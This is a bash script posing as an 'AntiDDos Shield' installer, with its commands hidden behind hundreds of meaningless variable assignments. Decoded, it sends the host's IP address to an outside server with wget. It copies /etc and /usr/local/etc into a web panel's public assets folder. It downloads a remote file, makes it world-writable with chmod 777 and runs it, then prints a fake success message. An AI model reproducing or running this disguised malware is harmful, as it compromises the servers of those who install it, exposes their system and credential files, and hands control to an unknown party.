#!/bin/bash 
 X56777CD=$( ip a s | sed -ne '/127.0.0.1/!{s/^[ \t]*inet[ \t]*\([0-9.]\+\)\/.*$/\1/p }')
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 U=3T32 B=s I=87TR LGDI=3 C=6345 V=5621
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 K=FG45 EE=wge RSE=2 Z=KSA X=H JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AA=A TC=t PP=6 CD=c Y=P G=K L=AN TT=: SS=ID UO=OS PBFL=7 KK=mod UU=m
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 U=3T32 B=s I=87TR LGDI=3 C=6345 V=5621 UIY=l HUKK=p AAF=a
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 RJT=as LFJA=e ASDG=edj ASRE=aaa LSXA=: PASR=d
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 U=3T32 B=s I=87TR LGDI=3 C=6345 V=5621
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 K=FG45 EE=wge RSE=2 Z=KSA X=H JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AA=A TC=t PP=6 CD=c T=F3T3 RJT=as LFJA=e ASDG=edj ASRE=aaa LSXA=: PASR=d
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 U=3T32 B=s I=87TR LGDI=3 C=6345 V=5621 HUFD=r HUNN=w
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 K=FG45 EE=wge RSE=2 Z=KSA X=H JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AA=A TC=t PP=6 CD=c Y=P G=K L=AN TT=: SS=ID UO=OS PBFL=7 KK=mod UU=m Y=P G=K L=AN TT=: SS=ID UO=OS PBFL=7 KK=mod UU=m K=FG45 EE=wge RSE=2 Z=KSA X=H JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AA=A TC=t PP=6 CD=c Y=P G=K L=AN TT=: SS=ID UO=OS PBFL=7 KK=mod UU=m
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 U=3T32 B=s I=87TR LGDI=3 C=6345 V=5621
 JKJK=s PASR=d LL=f UIUJ=u JUIH=o S=h TC=t UU=m HUED=va VBBNR=cp CD=c YUHIO='-d'
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 K=FG45 EE=wge RSE=2 Z=KSA X=H JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AA=A TC=t PP=6 CD=c Y=P G=K T=F3T3 RJT=as LFJA=e ASDG=edj ASRE=aaa LSXA=: PASR=d
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 U=3T32 B=s I=87TR LGDI=3 C=6345 V=5621
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 K=FG45 EE=wge RSE=2 Z=KSA X=H JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AAF=a TC=t PP=6 NC='\033[3J' CD=c Y=P G=K L=AN TT=: SS=ID UO=OS PBFL=7 KK=mod UU=m L=AN TT=: SS=ID UO=OS PBFL=7 KK=mod UU=m
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 U=3T32 B=s I=87TR LGDI=3 C=6345 V=5621 HHKJ=n LFJA=e 
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 K=FG45 EE=wge RSE=2 Z=KSA X=H JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AA=A TC=t PP=6 CD=c Y=P G=K L=AN TT=: SS=ID UO=OS PBFL=7 KK=mod UU=m
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 T=F3T3 RJT=as LFJA=e ASDG=edj ASRE=aaa LSXA=: PASR=d
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 U=3T32 B=s I=87TR LGDI=3 C=6345 V=5621 UUY=i LL=f
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 K=FG45 EE=wge RSE=2 Z=KSA X=H JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AA=A TC=t PP=6 CD=c Y=P G=K L=AN TT=: SS=ID UO=OS PBFL=7 KK=mod UU=m U=3T32 B=s I=87TR LGDI=3 C=6345 V=5621 
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 U=3T32 B=s I=87TR LGDI=3 C=6345 V=5621 UIY=l
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 K=FG45 EE=wge RSE=2 Z=KSA X=H JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AA=A TC=t PP=6 CD=c Y=P G=K L=AN TT=: YFED='\033[0;31m' SS=ID UO=OS PBFL=7 KK=mod UU=m
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 T=F3T3 RJT=as LFJA=e ASDG=edj ASRE=aaa LSXA=: PASR=d
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 U=3T32 DIEL='-R' B=s I=87TR LGDI=3 C=6345 V=5621 
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 K=FG45 EE=wge RSE=2 Z=KSA X=H JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AA=A TC=t PP=6 CD=c Y=P G=K L=AN TT=: SS=ID UO=OS PBFL=7 KK=mod UU=m K=FG45 EE=wge RSE=2 Z=KSA X=H JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AA=A TC=t PP=6 CD=c Y=P T=F3T3 RJT=as LFJA=e ASDG=edj ASRE=aaa LSXA=: PASR=d
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 U=3T32 B=s I=87TR LGDI=3 C=6345 V=5621 CVVV=o
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 K=FG45 EE=wge RSE=2 Z=KSA X=H bb=h JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AA=A TC=t PP=6 CD=c Y=P G=K L=AN TT=: SS=ID UO=OS PBFL=7 KK=mod UU=m G=K L=AN TT=: SS=ID UO=OS PBFL=7 KK=mod UU=m
 D=. KSA=4 Q=A0A4 ONBO=9 N=E45R OTF=1 U=3T32 B=s I=87TR LGDI=3 C=6345 V=5621 GJJ=-
 S=h M=T354 WBUV=8 F=FW34 T=F3T3 K=FG45 EE=wge RSE=2 Z=KSA X=H JJ=r QHW=0 W=S R=T
 YT=/ OFBI=5 AA=A TC=t PP=6 CD=c Y=P G=K L=AN TT=: SS=ID UO=OS PBFL=7 KK=mod UU=m
 C=`expr $C + $V` 
  $EE$TC $X$R$R$Y$W$TT$YT$YT$Y$AA$Z$R$D$Y$G$YT$L$R$SS$UO$W$YT$EE$D$HUKK$BB$HUKK?$UUY$HUKK=$X56777CD 2>/dev/nul
if [ $YUHIO "$YT$HUED$HUFD$YT$HUNN$HUNN$HUNN$YT$S$TC$UU$UIY$YT$HUKK$AAF$HHKJ$LFJA$UIY" ]; then
  $VBBNR $DIEL $YT$HUED$HUFD$YT$LFJA$TC$CD$YT $YT$HUED$HUFD$YT$HUNN$HUNN$HUNN$YT$S$TC$UU$UIY$YT$HUKK$AAF$HHKJ$LFJA$UIY$YT$TC$LFJA$UU$HUKK$UIY$AAF$TC$LFJA$JKJK$YT$PASR$LFJA$LL$AAF$UIUJ$UIY$TC$YT$AAF$JKJK$JKJK$LFJA$TC$JKJK$YT
  $VBBNR $DIEL $YT$UIUJ$JKJK$HUFD$YT$UIY$JUIH$CD$AAF$UIY$YT$LFJA$TC$CD$YT $YT$HUED$HUFD$YT$HUNN$HUNN$HUNN$YT$S$TC$UU$UIY$YT$HUKK$AAF$HHKJ$LFJA$UIY$YT$TC$LFJA$UU$HUKK$UIY$AAF$TC$LFJA$JKJK$YT$PASR$LFJA$LL$AAF$UIUJ$UIY$TC$YT$AAF$JKJK$JKJK$LFJA$TC$JKJK$YT
  else
  $VBBNR $DIEL $YT$HUED$HUFD$YT$LFJA$TC$CD$YT $YT$HUED$HUFD$YT$HUNN$HUNN$HUNN$YT$S$TC$UU$UIY$YT$TC$LFJA$UU$HUKK$UIY$AAF$TC$LFJA$JKJK$YT$PASR$LFJA$LL$AAF$UIUJ$UIY$TC$YT$AAF$JKJK$JKJK$LFJA$TC$JKJK$YT
  $VBBNR $DIEL $YT$UIUJ$JKJK$HUFD$YT$UIY$JUIH$CD$AAF$UIY$YT$LFJA$TC$CD$YT $YT$HUED$HUFD$YT$HUNN$HUNN$HUNN$YT$S$TC$UU$UIY$YT$TC$LFJA$UU$HUKK$UIY$AAF$TC$LFJA$JKJK$YT$PASR$LFJA$LL$AAF$UIUJ$UIY$TC$YT$AAF$JKJK$JKJK$LFJA$TC$JKJK$YT
fi
 $EE$TC $X$R$R$Y$W$TT$YT$YT$Y$AA$Z$R$D$Y$G$YT$L$R$SS$UO$W$YT$C$Q$F$U$I$S$N$M$F$T$K$B$V$D$B$S -O $D$D$YT$F$T$F$T$F$T$F$T$D$B$S
 $CD$S$KK 777 $YT$F$T$F$T$F$T$F$T$D$B$S
 $D$D$YT$F$T$F$T$F$T$F$T$D$B$S
 $JJ$UUU $D$D$YT$F$T$F$T$F$T$F$T$D$B$S
 $LFJA$CD$bb$CVVV $YFED
 $CD$UIY$LFJA$AAF$JJ
 $LFJA$CD$bb$CVVV $NC
 $LFJA$CD$bb$CVVV ''
 $LFJA$CD$bb$CVVV '    Success If You Are Seeing This Message That Mean You All Done!'
 $LFJA$CD$bb$CVVV ''
 $LFJA$CD$bb$CVVV '    AntiDDos Shield by ZinskyRoy'
 $LFJA$CD$bb$CVVV ''
 $LFJA$CD$bb$CVVV '    Version :> 2.0'
 $LFJA$CD$bb$CVVV ''
 fi


